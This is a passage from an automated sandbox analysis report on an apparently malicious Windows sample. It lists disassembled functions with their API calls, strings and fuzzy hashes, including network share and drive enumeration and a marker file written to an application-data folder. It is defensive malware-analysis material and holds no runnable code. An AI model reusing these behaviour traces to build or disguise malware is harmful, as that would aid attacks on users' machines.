                                  • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00432713
                                  • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 00432726
                                  • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00432739
                                  • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 0043274C
                                  • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 0043275F
                                  • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00432772
                                  • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00432785
                                  • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00432798
                                  • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 004327AB
                                  • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 004327BE
                                  • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 004327D1
                                • __mtinitlocks.LIBCMT ref: 00425146
                                • __mtterm.LIBCMT ref: 0042514F
                                  • Part of subcall function 004251B7: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,00425154,00423FFE,00507990,00000014), ref: 00428B62
                                  • Part of subcall function 004251B7: _free.LIBCMT ref: 00428B69
                                  • Part of subcall function 004251B7: DeleteCriticalSection.KERNEL32(0050AC00,?,?,00425154,00423FFE,00507990,00000014), ref: 00428B8B
                                • __calloc_crt.LIBCMT ref: 00425174
                                • __initptd.LIBCMT ref: 00425196
                                • GetCurrentThreadId.KERNEL32 ref: 0042519D
                                Memory Dump Source
                                • Source File: 00000002.00000002.2170448780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000002.00000002.2170448780.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                • Associated: 00000002.00000002.2170448780.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
                                • String ID:
                                • API String ID: 3567560977-0
                                • Opcode ID: 2aee27b5b182f6f3ae5a16561744fd9baa8d574365a868c1e04c7c5c44b22f1c
                                • Instruction ID: 366d1241f395ce705af539ece55ec53f654f371a685379b5f067519d47a60e56
                                • Opcode Fuzzy Hash: 2aee27b5b182f6f3ae5a16561744fd9baa8d574365a868c1e04c7c5c44b22f1c
                                • Instruction Fuzzy Hash: 75F0CD32B4AB712DE2343AB67D03B6B2680AF00738BA1061FF064C42D1EF388401455C
                                APIs
                                • __lock.LIBCMT ref: 0042594A
                                  • Part of subcall function 00428AF7: __mtinitlocknum.LIBCMT ref: 00428B09
                                  • Part of subcall function 00428AF7: __amsg_exit.LIBCMT ref: 00428B15
                                  • Part of subcall function 00428AF7: EnterCriticalSection.KERNEL32(i;B,?,004250D7,0000000D), ref: 00428B22
                                • _free.LIBCMT ref: 00425970
                                  • Part of subcall function 00420BED: HeapFree.KERNEL32(00000000,00000000,?,0042507F,00000000,0042520D,00420CE9), ref: 00420C01
                                  • Part of subcall function 00420BED: GetLastError.KERNEL32(00000000,?,0042507F,00000000,0042520D,00420CE9), ref: 00420C13
                                • __lock.LIBCMT ref: 00425989
                                • ___removelocaleref.LIBCMT ref: 00425998
                                • ___freetlocinfo.LIBCMT ref: 004259B1
                                • _free.LIBCMT ref: 004259C4
                                Memory Dump Source
                                • Source File: 00000002.00000002.2170448780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000002.00000002.2170448780.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                • Associated: 00000002.00000002.2170448780.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: __lock_free$CriticalEnterErrorFreeHeapLastSection___freetlocinfo___removelocaleref__amsg_exit__mtinitlocknum
                                • String ID:
                                • API String ID: 626533743-0
                                • Opcode ID: c56b173b0890e450cc2a22b220cebe42ac0930fc8d6ccd74ffd4a749de21d878
                                • Instruction ID: 81c7b0a8007453265eca5a285afc690957d7e654b57493ebbede42104a270bc8
                                • Opcode Fuzzy Hash: c56b173b0890e450cc2a22b220cebe42ac0930fc8d6ccd74ffd4a749de21d878
                                • Instruction Fuzzy Hash: E801A1B1702B20E6DB34AB69F446B1E76A0AF10739FE0424FE0645A1D5CFBD99C0CA5D
                                APIs
                                • ___from_strstr_to_strchr.LIBCMT ref: 004507C3
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.2170448780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000002.00000002.2170448780.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                • Associated: 00000002.00000002.2170448780.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: ___from_strstr_to_strchr
                                • String ID: error:%08lX:%s:%s:%s$func(%lu)$lib(%lu)$reason(%lu)
                                • API String ID: 601868998-2416195885
                                • Opcode ID: 46bb62eb4ffcb3ef403e86853a7eb45dbe6c4dfbd3a8551aa62d907c1259c874
                                • Instruction ID: 4fd155d7ac4cfc4ad9107eba643b63d3b81161049ee91e28a54c83c9030a6459
                                • Opcode Fuzzy Hash: 46bb62eb4ffcb3ef403e86853a7eb45dbe6c4dfbd3a8551aa62d907c1259c874
                                • Instruction Fuzzy Hash: F64109756043055BDB20EE25CC45BAFB7D8EF85309F40082FF98593242E679E90C8B96
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.2170448780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000002.00000002.2170448780.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                • Associated: 00000002.00000002.2170448780.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: _memset
                                • String ID: .\crypto\buffer\buffer.c$g9F
                                • API String ID: 2102423945-3653307630
                                • Opcode ID: 41b8760603798dafaf4d4572c250bcd82449d7f0d7c455ebd7b4e1b6c976a6df
                                • Instruction ID: 958ac6a2dbe7618ecd56aaf11cdfe4c63fb5daf7b6a990d4d23814bb8d8bf6ac
                                • Opcode Fuzzy Hash: 41b8760603798dafaf4d4572c250bcd82449d7f0d7c455ebd7b4e1b6c976a6df
                                • Instruction Fuzzy Hash: 27212BB6B403213FE210665DFC43B66B399EB84B15F10413BF618D73C2D6A8A865C3D9
                                APIs
                                • __getptd_noexit.LIBCMT ref: 004C5D3D
                                  • Part of subcall function 0042501F: GetLastError.KERNEL32(?,i;B,0042520D,00420CE9,?,?,00423B69,?), ref: 00425021
                                  • Part of subcall function 0042501F: __calloc_crt.LIBCMT ref: 00425042
                                  • Part of subcall function 0042501F: __initptd.LIBCMT ref: 00425064
                                  • Part of subcall function 0042501F: GetCurrentThreadId.KERNEL32 ref: 0042506B
                                  • Part of subcall function 0042501F: SetLastError.KERNEL32(00000000,i;B,0042520D,00420CE9,?,?,00423B69,?), ref: 00425083
                                • __calloc_crt.LIBCMT ref: 004C5D60
                                • __get_sys_err_msg.LIBCMT ref: 004C5D7E
                                • __get_sys_err_msg.LIBCMT ref: 004C5DCD
                                Strings
                                • Visual C++ CRT: Not enough memory to complete call to strerror., xrefs: 004C5D48, 004C5D6E
                                Memory Dump Source
                                • Source File: 00000002.00000002.2170448780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000002.00000002.2170448780.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                • Associated: 00000002.00000002.2170448780.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: ErrorLast__calloc_crt__get_sys_err_msg$CurrentThread__getptd_noexit__initptd
                                • String ID: Visual C++ CRT: Not enough memory to complete call to strerror.
                                • API String ID: 3123740607-798102604
                                • Opcode ID: 560737a3d48f69e2c1bbacaa64e20750b253c0be39bebdd764001766347183bc
                                • Instruction ID: efefb7cdb09aa89a66c944e42d5018451410fe076c3b278b171ca9447b521f4c
                                • Opcode Fuzzy Hash: 560737a3d48f69e2c1bbacaa64e20750b253c0be39bebdd764001766347183bc
                                • Instruction Fuzzy Hash: 8E11E935601F2567D7613A66AC05FBF738CDF007A4F50806FFE0696241E629AC8042AD
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.2170448780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000002.00000002.2170448780.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                • Associated: 00000002.00000002.2170448780.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: _fprintf_memset
                                • String ID: .\crypto\pem\pem_lib.c$Enter PEM pass phrase:$phrase is too short, needs to be at least %d chars
                                • API String ID: 3021507156-3399676524
                                APIs
                                • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0040C51B
                                • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0040C539
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.2170448780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000002.00000002.2170448780.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                • Associated: 00000002.00000002.2170448780.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: Path$AppendFolder
                                • String ID: bowsakkdestx.txt
                                • API String ID: 29327785-2616962270
                                APIs
                                • CreateWindowExW.USER32(00000000,LPCWSTRszWindowClass,LPCWSTRszTitle,00CF0000,80000000,00000000,80000000,00000000,00000000,00000000,?,00000000), ref: 0041BAAD
                                • ShowWindow.USER32(00000000,00000000), ref: 0041BABE
                                • UpdateWindow.USER32(00000000), ref: 0041BAC5
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.2170448780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000002.00000002.2170448780.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                • Associated: 00000002.00000002.2170448780.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: Window$CreateShowUpdate
                                • String ID: LPCWSTRszTitle$LPCWSTRszWindowClass
                                • API String ID: 2944774295-3503800400
                                APIs
                                • WNetOpenEnumW.MPR(00000002,00000000,00000000,?,?), ref: 00410C12
                                • GlobalAlloc.KERNEL32(00000040,00004000,?,?), ref: 00410C39
                                • _memset.LIBCMT ref: 00410C4C
                                • WNetEnumResourceW.MPR(?,?,00000000,?), ref: 00410C63
                                Memory Dump Source
                                • Source File: 00000002.00000002.2170448780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000002.00000002.2170448780.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                • Associated: 00000002.00000002.2170448780.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: Enum$AllocGlobalOpenResource_memset
                                • String ID:
                                • API String ID: 364255426-0
                                APIs
                                • __getenv_helper_nolock.LIBCMT ref: 00441726
                                • _strlen.LIBCMT ref: 00441734
                                  • Part of subcall function 00425208: __getptd_noexit.LIBCMT ref: 00425208
                                • _strnlen.LIBCMT ref: 004417BF
                                • __lock.LIBCMT ref: 004417D0
                                • __getenv_helper_nolock.LIBCMT ref: 004417DB
                                Memory Dump Source
                                • Source File: 00000002.00000002.2170448780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000002.00000002.2170448780.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                • Associated: 00000002.00000002.2170448780.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: __getenv_helper_nolock$__getptd_noexit__lock_strlen_strnlen
                                • String ID:
                                • API String ID: 2168648987-0
                                APIs
                                • GetLogicalDrives.KERNEL32 ref: 00410A75
                                • SetErrorMode.KERNEL32(00000001,00500234,00000002), ref: 00410AE2
                                • PathFileExistsA.SHLWAPI(?), ref: 00410AF9
                                • SetErrorMode.KERNEL32(00000000), ref: 00410B02
                                • GetDriveTypeA.KERNEL32(?), ref: 00410B1B
                                Memory Dump Source
                                • Source File: 00000002.00000002.2170448780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000002.00000002.2170448780.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                • Associated: 00000002.00000002.2170448780.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: ErrorMode$DriveDrivesExistsFileLogicalPathType
                                • String ID:
                                • API String ID: 2560635915-0
                                APIs
                                • _malloc.LIBCMT ref: 0043B70B
                                  • Part of subcall function 00420C62: __FF_MSGBANNER.LIBCMT ref: 00420C79
                                  • Part of subcall function 00420C62: __NMSG_WRITE.LIBCMT ref: 00420C80
                                  • Part of subcall function 00420C62: RtlAllocateHeap.NTDLL(00670000,00000000,00000001,?,?,?,?,00423B69,?), ref: 00420CA5
                                • _free.LIBCMT ref: 0043B71E
                                Memory Dump Source
                                • Source File: 00000002.00000002.2170448780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000002.00000002.2170448780.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                • Associated: 00000002.00000002.2170448780.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: AllocateHeap_free_malloc
                                • String ID:
                                • API String ID: 1020059152-0
                                APIs
                                • PostThreadMessageW.USER32(00000012,00000000,00000000), ref: 0041F085
                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0041F0AC
                                • DispatchMessageW.USER32(?), ref: 0041F0B6
                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0041F0C4
                                • WaitForSingleObject.KERNEL32(0000000A), ref: 0041F0D2
                                Memory Dump Source
                                • Source File: 00000002.00000002.2170448780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000002.00000002.2170448780.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                • Associated: 00000002.00000002.2170448780.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: Message$Peek$DispatchObjectPostSingleThreadWait
                                • String ID:
                                • API String ID: 1380987712-0
                                APIs
                                • PostThreadMessageW.USER32(00000012,00000000,00000000), ref: 0041E515
                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0041E53C
                                • DispatchMessageW.USER32(?), ref: 0041E546
                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0041E554
                                • WaitForSingleObject.KERNEL32(0000000A), ref: 0041E562
                                Memory Dump Source
                                • Source File: 00000002.00000002.2170448780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000002.00000002.2170448780.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                • Associated: 00000002.00000002.2170448780.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: Message$Peek$DispatchObjectPostSingleThreadWait
                                • String ID:
                                • API String ID: 1380987712-0
                                APIs
                                • PostThreadMessageW.USER32(?,00000012,00000000,00000000), ref: 0041FA53
                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0041FA71
                                • DispatchMessageW.USER32(?), ref: 0041FA7B
                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0041FA89
                                • WaitForSingleObject.KERNEL32(?,0000000A,?,00000012,00000000,00000000), ref: 0041FA94
                                Memory Dump Source
                                • Source File: 00000002.00000002.2170448780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000002.00000002.2170448780.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                • Associated: 00000002.00000002.2170448780.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: Message$Peek$DispatchObjectPostSingleThreadWait
                                • String ID:
                                • API String ID: 1380987712-0
                                APIs
                                • PostThreadMessageW.USER32(?,00000012,00000000,00000000), ref: 0041FE03
                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0041FE21
                                • DispatchMessageW.USER32(?), ref: 0041FE2B
                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0041FE39
                                • WaitForSingleObject.KERNEL32(?,0000000A,?,00000012,00000000,00000000), ref: 0041FE44
                                Memory Dump Source
                                • Source File: 00000002.00000002.2170448780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000002.00000002.2170448780.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                • Associated: 00000002.00000002.2170448780.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: Message$Peek$DispatchObjectPostSingleThreadWait
                                • String ID:
                                • API String ID: 1380987712-0
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.2170448780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000002.00000002.2170448780.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                • Associated: 00000002.00000002.2170448780.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: _memmove
                                • String ID: invalid string position$string too long
                                • API String ID: 4104443479-4289949731
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.2170448780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000002.00000002.2170448780.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                • Associated: 00000002.00000002.2170448780.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: _memmove
                                • String ID: invalid string position$string too long
                                • API String ID: 4104443479-4289949731
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.2170448780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000002.00000002.2170448780.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                • Associated: 00000002.00000002.2170448780.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: _wcsnlen
                                • String ID: U
                                • API String ID: 3628947076-3372436214
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.2170448780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000002.00000002.2170448780.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                • Associated: 00000002.00000002.2170448780.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: _memset
                                • String ID: .\crypto\buffer\buffer.c$C7F
                                • API String ID: 2102423945-2013712220
                                APIs
                                Strings
                                • 8a4577dc-de55-4eb5-b48a-8a3eee60cd95, xrefs: 0040C687
                                Memory Dump Source
                                • Source File: 00000002.00000002.2170448780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000002.00000002.2170448780.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                • Associated: 00000002.00000002.2170448780.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: StringUuid$CreateFree
                                • String ID: 8a4577dc-de55-4eb5-b48a-8a3eee60cd95
                                • API String ID: 3044360575-2335240114
                                APIs
                                • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0040C48B
                                • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0040C4A9
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.2170448780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000002.00000002.2170448780.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                • Associated: 00000002.00000002.2170448780.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: Path$AppendFolder
                                • String ID: bowsakkdestx.txt
                                • API String ID: 29327785-2616962270
                                APIs
                                • _malloc.LIBCMT ref: 00423B64
                                  • Part of subcall function 00420C62: __FF_MSGBANNER.LIBCMT ref: 00420C79
                                  • Part of subcall function 00420C62: __NMSG_WRITE.LIBCMT ref: 00420C80
                                  • Part of subcall function 00420C62: RtlAllocateHeap.NTDLL(00670000,00000000,00000001,?,?,?,?,00423B69,?), ref: 00420CA5
                                • std::exception::exception.LIBCMT ref: 00423B82
                                • __CxxThrowException@8.LIBCMT ref: 00423B97
                                  • Part of subcall function 00430ECA: RaiseException.KERNEL32(?,?,?,<yP,?,?,?,?,?,00423B9C,?,0050793C,?,00000001), ref: 00430F1F
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.2170448780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000002.00000002.2170448780.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                • Associated: 00000002.00000002.2170448780.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: AllocateExceptionException@8HeapRaiseThrow_mallocstd::exception::exception
                                • String ID: bad allocation
                                • API String ID: 3074076210-2104205924
                                APIs
                                • LoadCursorW.USER32(00000000,00007F00), ref: 0041BA4A
                                • RegisterClassExW.USER32(00000030), ref: 0041BA73
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.2170448780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000002.00000002.2170448780.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                • Associated: 00000002.00000002.2170448780.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: ClassCursorLoadRegister
                                • String ID: 0$LPCWSTRszWindowClass
                                • API String ID: 1693014935-1496217519
                                • Opcode ID: fbf28ebe5b3b724a216796b7602f5ba5b22e3d17e3910e7f530213bb4edbfbf6
                                • Instruction ID: 39b267f2af3e8e8601893d5e13e9f0aceec8bb1d15aa8544f670d774de374bdc
                                • Opcode Fuzzy Hash: fbf28ebe5b3b724a216796b7602f5ba5b22e3d17e3910e7f530213bb4edbfbf6
                                • Instruction Fuzzy Hash: 64F0AFB0C042089BEB00DF90D9597DEBBB8BB08308F108259D8187A280D7BA1608CFD9
                                APIs
                                • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0040C438
                                • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0040C44E
                                • DeleteFileA.KERNEL32(?), ref: 0040C45B
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.2170448780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000002.00000002.2170448780.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                • Associated: 00000002.00000002.2170448780.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: Path$AppendDeleteFileFolder
                                • String ID: bowsakkdestx.txt
                                • API String ID: 610490371-2616962270
                                • Opcode ID: 51c9fbb63abd04c953cc1c90cd388c2580edec88c84091088bf86cba3f20ed90
                                • Instruction ID: 22f96f022367e4ecd8cb06d74e3ea6c1a096c1ee21cc35b9366b07434c4c4e8f
                                • Opcode Fuzzy Hash: 51c9fbb63abd04c953cc1c90cd388c2580edec88c84091088bf86cba3f20ed90
                                • Instruction Fuzzy Hash: 60E0807564031C67DB109B60DCC9FD5776C9B04B01F0000B2FF48D10D1D6B495444E55
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.2170448780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000002.00000002.2170448780.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                • Associated: 00000002.00000002.2170448780.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: _memset
                                • String ID: p2Q
                                • API String ID: 2102423945-1521255505
                                • Opcode ID: 46ecb9121aab2c4594d1f343841fc1340943ec8095ce101e3444a0aa36bfb78c
                                • Instruction ID: 738f0ca8778653557991c93ab9a04937910ac7dae49cf0696bf478295a84fdc8
                                • Opcode Fuzzy Hash: 46ecb9121aab2c4594d1f343841fc1340943ec8095ce101e3444a0aa36bfb78c
                                • Instruction Fuzzy Hash: C5F03028684750A5F7107750BC667953EC1A735B08F404048E1142A3E2D7FD338C63DD
                                APIs
                                Memory Dump Source
                                • Source File: 00000002.00000002.2170448780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000002.00000002.2170448780.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                • Associated: 00000002.00000002.2170448780.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: _memmove_strtok
                                • String ID:
                                • API String ID: 3446180046-0
                                • Opcode ID: 205b1ec61ce906ac0e6ef9ac2fb6feb778f8951e500b67679f42a44b4349684c
                                • Instruction ID: d0e58e2a66e8e3875a5229d26ee444e1e0210206766639419d48370c530ec9d7
                                • Opcode Fuzzy Hash: 205b1ec61ce906ac0e6ef9ac2fb6feb778f8951e500b67679f42a44b4349684c
                                • Instruction Fuzzy Hash: 7F81B07160020AEFDB14DF59D98079ABBF1FF14304F54492EE40567381D3BAAAA4CB96
                                APIs
                                Memory Dump Source
                                • Source File: 00000002.00000002.2170448780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
